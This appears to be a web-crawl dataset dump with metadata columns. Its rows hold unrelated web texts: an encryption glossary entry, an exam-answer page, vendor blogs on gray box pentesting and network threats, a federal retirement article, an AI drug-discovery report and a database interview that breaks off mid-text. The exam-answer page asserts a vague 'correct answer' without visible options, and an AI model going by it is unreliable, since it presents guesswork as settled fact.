text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62
values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1
value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
Format Preserving Encryption (FPE)
Format preserving encryption (FPE) is a cryptographic method that encrypts data while keeping its original format intact. Unlike traditional encryption, which often changes the structure or length of the data, FPE ensures that the encrypted output maintains the same format, such as the same length and character set as the input. This is particularly useful in situations where the data needs to fit into existing systems or databases that expect specific formats, like credit card numbers, social security numbers, or dates. FPE allows sensitive information to be encrypted without disrupting the underlying system that handles or stores the data, providing security while preserving compatibility. | <urn:uuid:e204b96c-3e42-4255-a376-cc033267a7ed> | CC-MAIN-2024-38 | https://en.fasoo.com/glossary/f/format-preserving-encryption-fpe/ | 2024-09-09T08:11:45Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651092.31/warc/CC-MAIN-20240909071529-20240909101529-00323.warc.gz | en | 0.893922 | 131 | 3.5 | 4 |
If you want multiple hosts on a network, where do you configure the setting?
Click on the arrows to vote for the correct answer
A. B. C. D.A
To configure settings for multiple hosts on a network, you need to configure the IP addressing settings on the networking devices that are responsible for routing traffic between the hosts. This typically involves configuring the network address and subnet mask for the network segment that the hosts are connected to, as well as configuring any necessary routing protocols.
The correct answer to the exam question is A. In the IP protocol. The IP protocol is responsible for providing unique addressing for each device on the network, and for routing packets between devices based on those addresses. To configure IP addressing settings, you can use a variety of methods, depending on the networking device and the software it is running. Some common methods include using a command-line interface (CLI) to enter configuration commands directly on the device, using a graphical user interface (GUI) provided by the device manufacturer, or using a third-party network management tool.
Configuring IP addresses for multiple hosts on a network typically involves assigning each host a unique IP address within the network segment, and configuring the subnet mask to define the range of addresses that are considered part of the same network. For example, if you have a network segment with a network address of 192.168.1.0 and a subnet mask of 255.255.255.0, you could assign IP addresses to hosts in the range of 192.168.1.1 to 192.168.1.254.
In addition to configuring IP addresses, you may also need to configure routing protocols to ensure that traffic is correctly routed between hosts on different network segments. Routing protocols such as OSPF or BGP can be used to dynamically exchange routing information between networking devices, allowing them to build and maintain a routing table that can be used to forward packets to their destination.
In summary, to configure settings for multiple hosts on a network, you need to configure the IP addressing settings on the networking devices that are responsible for routing traffic between the hosts. This typically involves configuring IP addresses and subnet masks for each host, and configuring routing protocols to ensure that traffic is correctly routed between different network segments. | <urn:uuid:666f5986-c0c6-4325-b060-09c11372189c> | CC-MAIN-2024-38 | https://www.exam-answer.com/multiple-hosts-network-configuration | 2024-09-09T08:28:36Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651092.31/warc/CC-MAIN-20240909071529-20240909101529-00323.warc.gz | en | 0.937208 | 470 | 3.84375 | 4 |
In our ongoing efforts to secure our digital landscapes, the frequency of cyberattacks continues to rise, emphasizing the need for robust cybersecurity measures. Recent statistics indicate that in 2022 alone, cybercrime has become a big stepping stone for most organizations, namely a $6 trillion one. This alarming figure underscores the urgency of developing innovative defense strategies.
In this context, gray box penetration testing has emerged as a dynamic approach, combining realism and security to strengthen digital defenses. This article aims to provide an in-depth understanding of gray box penetration testing, including its definition, methodology, significance supported by data, and the boundaries it operates within.
What is Gray Box Penetration Testing?
Gray box penetration testing is a type of penetration testing in which the pentesters have partial knowledge of the network and infrastructure of the system they are testing. Then, the pentesters use their own understanding of the system to do a better job of finding and reporting vulnerabilities in it.
In a sense, a gray box test is a combination of a black box test and a white box test. The black box test is a test that is done from the outside in, with the tester not knowing the system before testing it. A white box test is a test that is done from the inside out, with the tester having full knowledge of the system before testing it. In this blog, we will only discuss gray box penetration testing to provide you with enough information on the same.
Why choose Gray Box Penetration Testing?
Gray box penetration testing is a method that marries the strengths of the Black Box and White Box approaches. The success rate of the same is as such dependent on your depth of understanding of the target environment. This unique approach makes gray box testing a preferred choice in controlled settings like military and intelligence agencies.
In fact, gray box pentesting evaluates both network and physical security, making it the perfect fit for breaches involving perimeter devices such as firewalls. This approach blends techniques like network scanning, vulnerability assessment, social engineering, and manual source code review to assess all potential impacts from hackers or attackers.
How does Gray Box Penetration Testing differ from the black box and white box?
Penetration testing is divided into three categories: black box, white box, and gray box. Let’s understand the differences between these three:
S No. | Black Box Penetration Testing | Gray Box Penetration Testing | White Box Penetration Testing |
1 | Little or No knowledge of network and infrastructure is required. | Somewhat knowledge of the Infrastructure, internal codebase and architecture. | Complete access to organization infrastructure, network and codebase. |
2 | Black box testing is also known as closed box testing. | Gray box testing is also known as translucent testing. | White box testing is known as clear box testing. |
3 | No syntactic knowledge of the programming language is required. | Requires partial understanding of the programming language. | Requires high understanding of programming language. |
4 | Black box testing techniques are executed by developers, user groups and testers. | Performed by third party services or by testers and developers. | The internal Development team of the organization can perform white box testing. |
5 | Some standard black box testing techniques are: Boundary value analysis, Equivalence partitioning, Graph-Based testing etc. | Some standard gray box testing techniques are Matrix testing, Regression testing, Orthogonal array testing, Pattern testing. | Some standard white box testing techniques are Branch testing, Decision coverage, Path testing, Statement coverage. |
5 steps to Perform Gray Box Penetration Testing
Gray box penetration testing is usually performed in 5 different steps mentioned below:
1. Planning and Requirements Analysis:
This phase includes understanding the scope of the application and the tech stack being used. The security team also requests some application-related information, such as dummy credentials, access roles, etc. This phase includes understanding the scope of the application and the tech stack being used. Furthermore, preparing a documentation map is also part of this phase.
2. Discovery Phase:
This phase is also known as Reconnaissance, which includes discovering the IP addresses being used, hidden endpoints, and API endpoints. The Discovery phase is not limited to networks but includes gathering information about the employees and their data, also known as Social Engineering.
3. Initial Exploitation:
Initial exploitation includes planning what kind of attacks will be launched in the later steps. This phase also includes finding misconfigurations in the servers and cloud-based infrastructure. The requested information helps the security team in creating various attack scenarios like privilege escalation etc. Further, behind the login, scanning would also be possible. Further, behind the login, scanning also goes on.
4. Advanced Penetration Testing:
This phase includes launching all planned attacks on the discovered endpoints—execution of Social Engineering attacks based on the collected information of employees. Furthermore, various vulnerabilities found are combined to create real-life attack situations.
5. Document & Report preparation:
The last step is preparing a detailed report of every endpoint tested along with a list of launched attacks.
Top 3 Gray Box Penetration Testing Techniques
Gray box pentest uses various types of techniques to generate test cases. Let’s understand some of them in detail:
1. Matrix testing
Matrix testing is a technique of software testing that helps to test the software thoroughly. It is the technique of identifying and removing all the unnecessary variables. Programmers use variables to store information while writing applications. Several variables should be as per requirement. Otherwise, it will reduce the efficiency of the program.
2. Regression testing
Regression testing is retesting the software components to find defects introduced by the changes made previously or in first the testing iteration. Regression testing is also known as retesting. It is performed to ensure that weaknesses are not introduced or reintroduced into a software system by modifications after the initial development. Regression Testing is an essential part of software testing because it helps to ensure that newly introduced software features continue to work as intended.
3. Orthogonal Array Testing
Orthogonal array testing is a software testing technique used to reduce test cases without reducing the test coverage. Orthogonal array testing is also known as the Orthogonal array method (OAM), Orthogonal array testing method (OATM), and Orthogonal test set.
What are the Benefits of Gray Box Penetration Testing?
1. Insider Information: Gray box testing is a perfect blend of black-box testing with knowledge of specific internal structures (or “inside knowledge”) of the item being tested. This inside knowledge could be available to the tester in the form of design documentation or code.
2. Less time-consuming: With insider knowledge, testers can plan and prioritize the testing, which will take less than planning test cases with no understanding of the network or codebase.
3. Non-intrusive and unbiased: Gray box test, which is also called non-intrusive and fair. It is said to be the best way to analyze the system without the source code. The gray box test treats the application as a black box. The tester will know how program components interact with each other but not about the detailed program functions and operations.
How Does Gray Box Testing Help Secure Your System?
While black-box tests mimic user experience without application knowledge, gray-box testing uses some information for more accurate user-like interactions.
In the face of determined outsiders despite standard security measures, gray box pentesting excels by focusing on post-breach behavior.
By using the above, you don’t only bolster system security against external threats but also insider risks. Testers’ partial application understanding allows realistic user experience simulations, uncovering errors, vulnerabilities, and exploits before cyber criminals do.
Why Astra’s Pentest Suite is a perfect fit for you?
All 3 types of penetration testing techniques have their own pros and cons but which one is perfect for you? Astra’s pentest suite is equipped with real-life hacking intelligence gathered from 1000+ vulnerability assessments and penetration tests (VAPT) done by our security experts on varied applications.
Say NO to the old boring way to test your organization’s security. Astra’s Vulnerability Scanner is ever learning from new CVEs, bug bounty data & intelligence gathered from pentest we do for companies in varied industries. Your CXOs get a birds-eye view of the security posture of your organization with data-backed insights that help them make the right decisions.
In addition, to ensure utmost security We here at Astra believe in ‘proactive security’ measures where we anticipate the infiltration techniques used by hackers and recommend additional security countermeasures to keep your and your customer’s data secure.
Features of Astra’s pentest suite:
- Self-served, on-the-cloud continuous scanner that runs 2500+ test cases covering OWASP, SANS, ISO, SOC, etc.
- Rich and easy-to-understand dashboard with a graphical representation that helps with vulnerability & patch management.
- Developer & CXO level reporting.
- Team collaboration options for assigning vulnerabilities for fixing.
- Multiple asset management under the same scan project.
- A dedicated ‘Vulnerabilities’ section that offers insights on vulnerability impact, severity, CVSS score, and potential loss (in $).
- A comprehensive scanner that includes all the mandatory local and global compliance requirement checks.
It is one small security loophole v/s your entire website or web application.
Get your web app audited with
Astra’s Continuous Pentest Solution.
1. What are the 5 stages of penetration testing?
Penetration testing comprises 1) reconnaissance, where information about the target is gathered; 2) scanning, identifying potential vulnerabilities; 3) gaining access through exploits; 4) maintaining access, testing for persistence; and 5) analysis, evaluating findings, and producing a comprehensive report for remediation. Find out more on the penetration testing guide. | <urn:uuid:7e3c97fb-de6a-4a0c-9e51-578b3ff644d3> | CC-MAIN-2024-38 | https://www.getastra.com/blog/security-audit/gray-box-penetration-testing/ | 2024-09-09T08:57:57Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651092.31/warc/CC-MAIN-20240909071529-20240909101529-00323.warc.gz | en | 0.918013 | 2,077 | 2.78125 | 3 |
Q: What do some of the government’s oldest and longest-serving employees have in common with the hairy-nosed wombat?
A: Both are on the endangered species list. The difference is that the wombat population is growing ever so slightly whereas as the long-time CSRS-covered civil servants grow fewer each year.
CSRS stands from Civil Service Retirement System. It’s a stand-alone plan — like the private sector had back in the day — where employees contribute a small portion of their income and Uncle Sam offers them a lifetime-annuity with inflation protection.
CSRS was replaced by the Federal Employee Retirement System in the 1980s. FERS offers a less generous civil service annuity, Social Security coverage and a more generous 401k plan — the Thrift Savings Plan — than available to CSRS employees. The FERS program forces workers to finance more of their retirement and costs Uncle Sam less. At the time of the switch there was speculation that when the number of CSRS employees got to a certain level, the government might seek to move them into FERS (which would require legislation) to save money. So is that end date approaching?
In 1994, according to the Congressional Research Service, just over half (52%) of all federal workers (1.4 million) were under the CSRS program. That has dropped dramatically as CSRS-covered people leave government, retire or die. In 2016 the CSRS population was less than 6%. There were 159,000 under CSRS, compared to 2,529,000 under FERS. That gap continues to grow.
Meantime, many CSRS workers are closing in on 41 years, 11 months of service when they can retire on the equivalent of 80% pay, more than double the benefit available under FERS.
So what if the government — or one of its independent operations — gave current CSRS employees a choice: Retire by a to-be-determined date and get full CSRS credit for their annuity, or continue in their jobs but with future benefits compiled under the less-generous FERS system.
A high-ranking, longtime career official said he’s heard there is a plan in the works that would end the CSRS program by giving employees the option. He said it would save the government salary money, reduce future retirement costs and give agencies the option of filling those CSRS jobs with lower-paid (less senior) people, or not filling them at all.
The head of a professional group with an excellent legislative tracking service said “I have not heard this,” he said. But he added, “I try to keep abreast of what is happening at U.S. Postal Service because, as a quasi-government federal entity, they seem to have there own set of rules. For example, an issue that I believe recently jumped out in the news was that one of their supervisor groups was negotiating a new salary deal! So anything may be possible at USPS!”
USPS, unlike most other federal operations, negotiates over wages and working conditions with powerful unions representing the clerk, carrier and mail handler crafts. And, it is working on a business plan showing how it can cut costs, including retirement and health insurance, in the future. Some other federal operations, like the Federal Deposit Insurance Corporation, Comptroller of the Currency and the Federal Reserve, have more generous wages and benefits. If the government wanted to test an end-CSRS program without going through Congress, any of them would be a likely place to start.
So if it happens, and that is a gigantic, speculative if at this point, and if you are with CSRS, would you take the bait, or switch to FERS and continue working?
Lemonade has been a quintessential summer refresher since our childhood. In fact, running a lemonade stand was the first taste many of us had with American capitalism. But like the apple pie, lemonade is not an American invention. It was around long before America itself. Lemons, which originated in Asia (India, northern Burma and China), had made their way to the Mediterranean coast and Egypt by the 12th century. Although it may have been drunk even earlier, the first written evidence of lemonade consumption comes from the writings of Persian poet Nasir-I-Khusraw. By the mid-1600s, the taste for lemonade had spread to Europe, and street-side “limonadiers” sold cups of a honey-sweetened version of the drink to passing Parisians. By the 18th century, lemonade had immigrated along with hundreds of thousands of Europeans to America. | <urn:uuid:52779ee6-7a7e-464f-baa1-7fcf0555c4cd> | CC-MAIN-2024-38 | https://federalnewsnetwork.com/federal-report/2019/08/csrs-time-buyout-fact-fiction-or-fantasy/ | 2024-09-14T03:52:38Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651548.18/warc/CC-MAIN-20240914025441-20240914055441-00823.warc.gz | en | 0.97102 | 965 | 2.578125 | 3 |
The digital world is under constant risk as cyber-attacks are becoming increasingly advanced and increasing at a staggering rate. While significant developments have been made to mitigate cyber risk, network security threats continue to evolve further to get unauthorized access and steal data from companies.
According to Cloudwards Cybersecurity Statistics 2024, Cybersecurity intrusions increased by 613% from 2013 to 2023.
In this digital age, despite every organization’s awareness of cybersecurity risk, many organizations still neglect to implement any protective measures to mitigate network vulnerabilities giving an opportunity to cyber attackers. This blog will help you understand types of network vulnerabilities and network threats and how to mitigate them but first let us start with understanding the meaning of network vulnerabilities.
What Are Network Vulnerabilities?
Network vulnerability is an inherent weakness or design flaw in a system’s software, hardware, network, or organizational processes that creates a looming threat over the data, system, or process of any organization. This network vulnerability leads to compromised data security in case of any cyber-attack.
5 Common Types of Network Security Vulnerabilities
Staying ahead of network threats is difficult, but not impossible. One needs to understand the nature of different network security vulnerabilities in their own system as the first step of mitigating the security risk. Perpetrators are constantly searching for ways to take advantage of network vulnerabilities in the dynamic virtual world. Recognizing the typical categories of network security weaknesses is the first line of defense for your digital assets against intrusions.
1. Physical Vulnerabilities
One of the most common mistakes while securing digital assets is overlooking the physical component of security. Lack of secure infrastructure where your servers or any other asset that can give access to your network or data is stored. This includes vulnerabilities like:
- Unsecured data centers: Unlocked data centers, lack of surveillance, or lack of access control system.
- Unauthorized access: Safety measures are not put in place so someone can only access servers with proper clearance.
2. Software-Based Vulnerabilities
No matter how secure the physical hardware or servers are, a device uses several software to work efficiently and if any of those softwares has any weaknesses then it is only a matter of time before a hacker will try to exploit that weakness. The software-based vulnerabilities include:
- Outdated software: Software developers are constantly keeping an eye on any new threat or error and coming up with the latest updates to fix those bugs.
- Operating system flaw: Bugs or weaknesses in the operating system can lead to attackers gaining control over your network.
- Third-party software risk: Sharing vulnerable data with any third-party software puts you in a risky place as they can exploit it for their benefit.
3. Human-Based Vulnerabilities
Humans are considered the weakest link as they inadvertently introduce vulnerabilities to any system. Employees, contractors, customers, and sometimes even vendors can bring network security threats to your doorstep. Common human-based vulnerabilities include:
- Phishing attacks: These are email or message-based network security attacks designed to manipulate the user into clicking on a harmful link.
- Social engineering attacks: It is a deceptive strategy to exploit human psychology to trick them into sharing sensitive information or compromising security through some malicious action.
- Accidental errors: Humans are prone to human error which oftentimes creates network security risks.
4. Configuration-Based Vulnerabilities
Oversight in the configuration of network devices, weak firewalls, and lack of access control can pose a significant threat to the organization. These misconfigurations are leaving the network exposed to a number of threats. Primary configuration-based vulnerabilities include:
- Weak passwords: Setting default passwords or easily predictable passwords can also compromise network security.
- Firewall misconfiguration: A firewall is first in line of defense for a secure network and firewall vulnerability contributes to a critical network threat.
- Unsecured Network Access Points: These are the open doors of any network offering direct entry to attackers to infiltrate any system.
5. IoT and Device Vulnerabilities
IoT devices are convenience-based devices, prone to attracting attackers as they offer minimal to no protection against any cyber-attack. Common IoT and device vulnerabilities include:
- Insecure default setting: Most IoT devices are shipped with default settings and passwords that can be easily found in online handbooks and help centers.
- Lack of encryption: IoT devices network in unencrypted making it easy to breach sensitive data.
- Firmware vulnerabilities: The almost impossible-to-update firmware leaves these devices unsecure once an updated version has been released.
By understanding these network vulnerabilities an organization can take proactive steps to prevent and mitigate the risk of network threats.
Understanding Network Security Threats
Day by day, networks are growing not just in size but also in complexity as new SaaS tools are introduced, data centers are shifting to new methods of storage, and with this growth constantly brand-new threats are emerging, creating a risk on confidentiality, integrity, and availability of data and resources.
A clear understanding of these threats is the first step toward taking robust preventive actions.
5 Types of Network Security Threats
Scroll down to explore some of the most common types of network security threats.
1. Malware and viruses
Short for malicious software, it is one of the significant threats to any network security. Malware includes viruses, worms, trojans, ransomware, spyware, adware, and many more. Malware is a result of network vulnerability and leads to compromised data.
The most common malware is a virus that takes birth from any infected program, file, or external storage device. It causes extensive problems as sometimes it slows down the system and others freeze them completely.
The most dangerous malware is ransomware as it encrypts the data and attackers extort payment in exchange for unlocking it. These network security attacks can cripple an organization by making its data unusable leading to monetary loss and lawsuits in worst-case scenarios.
2. Phishing and social engineering attacks
Unsuspecting people are one of the biggest threats to a network as they can intentionally or unintentionally be manipulated into revealing sensitive information of an organization. In social engineering hackers attack people’s sense of trust in order to trick them into performing some actions that compromise the safety of the data and systems of the business.
Social engineering includes Phishing, which is trusting a fake email or website designed to steal information. While primary preventive actions are taken against intentional data breaches, many researchers have found that most cyber-attacks are a result of sheer negligence on the part of employees.
3. DDoS and botnet attacks
DDoS stands for distributed denial of service. In this, the attacker sends an overwhelming amount of bogus or artificial traffic to an organization’s website or application. This traffic results in the unavailability of the network for genuine users.
Botnets stand for Robot Network and are created with the intention to launch a large-scale DDoS attack, send spam emails, or perform other malicious activities. They primarily infect IoT devices so the hacker can have remote control over the network.
A DDoS attack can cause significant monetary loss, and reputational damage. It can also be used as a distractive method to launch a much bigger and harmful attack.
4. Man-in-the-middle (MitM) attacks
As the name suggests, MitM is when a hacker eavesdrops in the middle of the user and any software or application to steal information and later uses the stolen information to blackmail or perform any other malevolent actions.
MitM majorly happens due to unsecured or poorly encrypted network data. The attacks are carried out in two phases, the attacker first intercepts user traffic and then decrypts the data without informing the user.
Furthermore, MitM can be disastrous if the attacker gains a foothold inside the server during the infiltration.
5. SQL injection and other cyber-attacks
SQL injection is a common vulnerability of web security that interferes with the query a user makes through its application to the database. These attack targets manipulate databases in servers by injecting harmful SQL code into the input field. The attacks if performed on a large scale allow attackers to view, modify, delete, or steal data, compromising its reliability and in worst-case scenarios, the attacker directly attacks the back-end infrastructure resulting in a denial-of-service attack.
These are a few of the most common network threats, but cyber-criminals are always searching for new ways to identify and take advantage of any network security vulnerabilities. In order to protect themselves, organizations must be watchful and take preventative action, such as implementing the newest firewalls and security technologies, updating their software frequently, and providing employee training.
- Deep Visibility and Control
- Eliminate Alert Fatigue
- Automated Detection and Response
Tools and Techniques for Vulnerability Assessment
Understanding network vulnerabilities and network threats is the first phase of protecting the digital assets of an organization. In the next step, one needs to effectively and regularly assess where vulnerabilities could exist.
Here are some essential tools and techniques for vulnerability assessment of network:
Penetration testing popularly known as “pen testing” is a technique where an organization hires ethical hackers or security professionals to stimulate or imitate an attack on the network and test the defense of an organization. The hired professional tries to breach the system and find any underlying vulnerability before any hacker does.
Penetration testing helps uncover all system weaknesses such as physical vulnerability, software-based vulnerability, or any misconfiguration in the network. In regular pen testing human elements are assessed to ensure that even social engineering cannot break the organization’s security posture.
Regular security audits
Regular security audits are a crucial factor in mitigating any network threat. These audits are performed to find any flaw or potential risk that may jeopardize the organization’s data and system. These audits are conducted either by the internal IT team or a third-party security professional.
The auditors make sure that the company’s information system conforms to both external and internal IT regulations. Both internal and external audits have benefits; internal auditors can offer objective audit results while external auditors have in-depth knowledge of the organization’s network.
Best Practices to Mitigate Network Vulnerabilities
Other than risk assessment there are some common practices that organizations adopt to diminish network vulnerabilities. Here are some key strategies to enhance network security:
Regular Software Updates and Patch Management
All software developers are coming up with regular updates to patch any security loopholes that can endanger the organization’s data. Regularly updating all software including operating systems, applications, and firmware is a sure-shot way of mitigating any network threat through the security flaw of software. On the other hand, delays in updating the software can expose your network and system to known and unknown network threats.
Strong Password Policies
Default or weak passwords are likened to an open door for hackers creating network security concerns. A “brute-force attack,” also known as password cracking, is a popular method hackers use to guess the password.
As a downside of advanced technology, there are hacking software easily available that are designed for brute-force attack. Organizations should create strong password regulations and, if necessary, multi-factor authentication (MFA) in order to protect themselves.
Employee Training and Awareness Programs
Humans are considered a weak link in the security protocols of any organization. Hence, it becomes important to regularly educate employees about network security risks and best practices. The training session should include information about phishing attacks, social engineering, the dangers of weak passwords, and awareness of any other potential risks. Regular training programs will eventually create a culture of cyber awareness that can reduce security breaches.
Implementing Firewalls and Intrusion Detection Systems (IDS)
Robust firewalls and Intrusion detection systems can detect any threat and send security alerts to systems to take preventive action. The detection works by monitoring and analyzing the incoming and outgoing traffic. Any suspicious activity is taken as a threat and cyber security teams are alerted to ensure safety. IDS works best if integrated with Intrusion prevention systems which can not only detect but also take proactive action to prevent any such malicious activity.
Secure Configuration Management
Misconfigured and incorrectly configured devices such as routers, servers, and IoT devices pose a big security risk for any organization. Ensuring secured configuration by disabling unnecessary services, changing default settings, and updating default passwords to strong passwords. Organizations should also use the principle of least privilege which states that users should only get the access they absolutely require.
A useful trick to keep data safe from unwanted usage is to encrypt it securely both in transit and at endpoints. Comprehensive encryptions guarantee that a hacker cannot decipher and misuse the data, even if it is intercepted or captured. The organization should implement encryption protocols and keep improving its practices before it loses pace with evolving threats.
Fidelis Network Detection and Response (NDR)
Fidelis NDR is your one-stop tool aimed at swiftly identifying and responding to any network threat. It works as the first line of defense with proactive monitoring of traffic and in case of any behavior anomaly detection or indications of malicious activities Fidelis NDR is equipped with technologies like:
Frequently Asked Questions
What are some of the most common vulnerabilities that exist in a network?
There are several common network vulnerabilities, including but not limited to:
- Physical Vulnerabilities: Lack of strong infrastructure around servers can give access to data to any perpetrators.
- Software vulnerabilities: Outdated software or getting software from unauthorized vendors makes your system vulnerable to attack.
- Configuration vulnerabilities: Misconfigured devices create an entry point for intruders.
- Human-based vulnerabilities: Untrained and unsuspecting employees often fall for phishing and other social engineering attacks to compromise an organization’s data. They are also one of the most common network vulnerabilities.
- IoT Vulnerabilities: IoT devices are often poorly configured with weak encryptions leading to cyber-attacks.
How Do Network Vulnerabilities Impact Businesses?
Network vulnerability often leads to many negative impacts on the business, some of which are:
- Data breach: Network vulnerability mostly led to compromising sensitive information of the organization.
- Disruption of operations: Attacks such as DDoS, or SQL injection can cause denial and disruption of services.
- Financial loss: Recovering stolen data, disruption of operations, and hefty lawsuits can cause monetary loss to businesses.
- Reputational loss: Any security breach damages customer confidence resulting in loss of business.
- Compliance violation: Data breach due to negligence attracts big fines and lawsuits.
How Can Network Vulnerabilities Be Identified?
There are tried and tested methods to identify any underlying network vulnerabilities.
- Penetration testing: Testing the system through stimulated attack can aware the organization of any hidden or intrinsic flaws.
- Security Audits: Regular security audits help to assess if network security measures are following IT protocols and industry protocols.
- Monitoring tools: There are firewalls and intrusion detection systems (IDS) available to detect any intrusion and alert the cyber security team.
What Is the Difference Between Network Vulnerabilities and Network Threats?
Network vulnerabilities: These are the design flaws in the system that can be exploited by hackers. These vulnerabilities include unpatched software, misconfigured devices, weak passwords, vulnerable IoT devices, etc.
Network threat: Network threats are the methods of attack that hackers use to exploit the vulnerable network. These threats include phishing attacks, Botnets, physical sabotage, viruses, SQL injection, etc.
How Can IoT Devices Introduce Network security Vulnerabilities?
Security factors are neglected while IoT devices are produced as they are only made for convenience. They are the most vulnerable machines prone to be attacked by hackers:
- Weak default setting: Keeping the default setting of an IoT device can give unauthorized access to your network to an attacker.
- Weak encryption: Strong encryption is often neglected in IoT devices making it easy to exploit.
- Insecure firmware: The firmware of such devices is difficult to update for a layman, creating an easy entry point for a potential attack. | <urn:uuid:47696fb4-b06b-4ff2-874d-cf4b19c452a1> | CC-MAIN-2024-38 | https://fidelissecurity.com/threatgeek/network-security/common-network-vulnerabilities-and-threats/ | 2024-09-14T05:19:51Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651548.18/warc/CC-MAIN-20240914025441-20240914055441-00823.warc.gz | en | 0.926694 | 3,326 | 2.71875 | 3 |
The company has been expanding generative AI models beyond language to apply the technology to the discovery of biological compounds. Results have since shown that this AI model can generate successful antiviral molecules for multiple target virus proteins, including SARS-CoV-2 (COVID-19).
At the time of the paper’s submission, antiviral properties of 11 molecules were successfully validated by Oxford researchers. This discovery has been hailed as a breakthrough that could get lifesaving drugs to people much faster.
A new class of AI-generated COVID antivirals
The AI world has seen plenty of healthcare breakthroughs recently, with cutting-edge software helping with new treatments and improving efficiency for patients.
In the study, researchers show that new antivirals can be designed, made and potentially validated in months. This type of AI breakthrough could see lifesaving drugs reach people faster in the next global healthcare crisis.
In collaboration with Enamine, a chemical supplier in Ukraine, and other researchers at the University of Oxford, they created a foundation model that was versatile enough to create new inhibitors for multiple protein targets without extra training.
The results were that the team hit on four potential COVID-19 antivirals in a fraction of the time it would have taken had they used conventional methods. Although the molecules still need to clear clinical trials, it still highlights the huge role that AI can play in the future of drug development.
“It took time to develop and validate these methods, but now that we have a working pipeline in place, we can generate results much faster,” said study co-author and IBM researcher, Payel Das.
“When the next virus emerges, generative AI could be pivotal in the search for new treatments.”
CogMol foundation model helps fight drug resistance
Developing new drugs is often slow. In the future, new drugs may be required to tackle new viruses and superbugs. Generative AI could act as a solution, with its ability to create molecules as highlighted in the outcome of this study.
Two of the AI-generated COVID-19 antivirals the researchers discovered bind to the virus’s spike protein in a distinctly new way. If developed into drugs, they could potentially complement some of today’s COVID antivirals in the same way.
The IBM and Oxford researchers built their model, Controlled Generation of Molecules (CogMol), on a generative AI architecture known as variational autoencoders, or VAEs. The model was then trained on a large dataset of molecules represented as strings of text, with general information about proteins and their binding properties.
Information about SARS-CoV-2’s 3D structure or molecules was left out, giving their generative foundation model a broad base of knowledge so that it could be more easily deployed for tasks it has never seen before.
Their goal was to find drug-like molecules that would bind with two COVID protein targets: the spike, which transmits the virus to the host cell and the main protease, which helps to spread the disease.
CogMol generated 875,000 candidate molecules in three days, with the novel compounds further tested in target inhibition and live virus neutralisation tests. Two of the validated antivirals targeted the main protease and the other two targeted the spike protein and were capable of neutralising all six major variants of COVID.
“We created valid antivirals using a generative foundation model that knew relatively little about its protein targets,” said the study’s co-senior author, IBM researcher and visiting Oxford professor, Jason Crain.
“I’m hopeful that these methods will allow us to create antivirals and other urgently needed compounds much faster and more inexpensively in the future.”
This work is hailed as a success much like the work of Google DeepMind, who also achieved scientific breakthroughs with AI, with the most recent being AlphaFold which can predict protein structures. This type of work has effectively changed the way this type of science operates, as researchers can analyse data in a much shorter space of time and hopefully better tackle diseases. | <urn:uuid:6305e3c6-12e2-43e1-8c3b-7c312e730e1b> | CC-MAIN-2024-38 | https://aimagazine.com/articles/ibm-oxford-university-discover-ai-antiviral-for-covid-19 | 2024-09-15T10:09:46Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651622.79/warc/CC-MAIN-20240915084859-20240915114859-00723.warc.gz | en | 0.962211 | 861 | 2.859375 | 3 |
One of the reasons that the University of California at Berkeley was been a hotbed of software technology back in the 1970s and 1980s is Michael Stonebraker, who was one of the pioneers in relational database technology and one of the industry’s biggest – and most vocal – shakers and movers and one of its most prolific serial entrepreneurs.
Like other database pioneers, Stonebraker read the early relational data model papers by IBMer Edgar Codd, and in 1973 started work on the Ingres database along IBM’s own System R database, which eventually became DB2, and Oracle’s eponymous database, which entered the field a few years later.
In the decades since the early database days, Stonebreaker helped create the Postgres follow-on to Ingres, which is commonly used today, and was also the CTO at relational database maker Informix, which was eaten by IBM many years ago and just recently mothballed. More importantly, he was one of the researchers on the the C-Store shared-nothing columnar database for data warehousing, which was eventually commercialized as Vertica, and a few years after that Stonebraker and friends started up the H-Store effort, a distributed, in-memory OLTP system that was eventually commercialized as VoltDB. Never one to sit still for long, Stonebraker led an effort to create an array-based database called SciDB that was explicitly tuned for the needs of technical applications, which think in terms of arrays, not tables as in the relational model.
That is an extremely abbreviated and oversimplified history of Stonebraker, who has been an adjunct professor of computer science at MIT since 2001 and who continues to shape the database world.
With so many new compute, storage, and networking technologies entering the field and so many different database and data store technologies available today, we thought it would be a good idea to touch base with Stonebraker to see what effect these might have on future databases.
Timothy Prickett Morgan: When it comes to data and storage, you have kind of seen it all, so I wanted to dive right in and get your sense of how the new compute and storage hardware that is coming to market particularly persistent memory – will affect the nature of databases in the near and far term. Let’s assume that DRAM and flash get cheaper again, unlike today, and that technologies like 3D XPoint come to market in both SSD and DIMM form factors. These make main memories larger and cheaper and flash gets even more data closer to compute than disk drives, no matter how you gang them up, ever could. Do we have to rethink the idea of cramming everything into main memory for performance reasons? The new technologies open up a lot of possibilities.
Michael Stonebraker: The issue is the changing storage hierarchy and what it has to do with databases. Let’s start with online transaction processing. In my opinion, this is a main memory system right now, and there are a bunch of NewSQL startups that are addressing this market. An OLTP database that is 1 TB in size is a really big one, and 1 TB of main memory is no big deal any more. So I think OLTP will entirely go to main memory for anybody who cares about performance. If you don’t care about performance, then run the database on your wristwatch or whatever.
In the data warehousing space, all of the traction is at the high end, where people are operating petascale data warehouses, so up there it is going to be a disk-based market indefinitely. The thing about business analysts and data scientists is that they have an insatiable desire to correlate more and more and more data. Data warehouses are therefore getting bigger at a rate that is faster than disk drives are getting cheaper.
Of course, the counter-example to this are companies like Facebook, and if you are a big enough whale, you might do things differently. Facebook has been investing like mad in SSDs as a level in their hierarchy. This is for active data. Cold data is going to be on disk forever, or until some other really cheap storage technology comes along.
If you have a 1 TB data warehouse, the Vertica Community Edition is free for this size, and the low-end system software are going to be essentially free. And if you care about performance, it is going to be in main memory and if you don’t care about performance, it will be on disk. It will be interesting to see if the data warehouse vendors invest more in multi-level storage hierarchies.
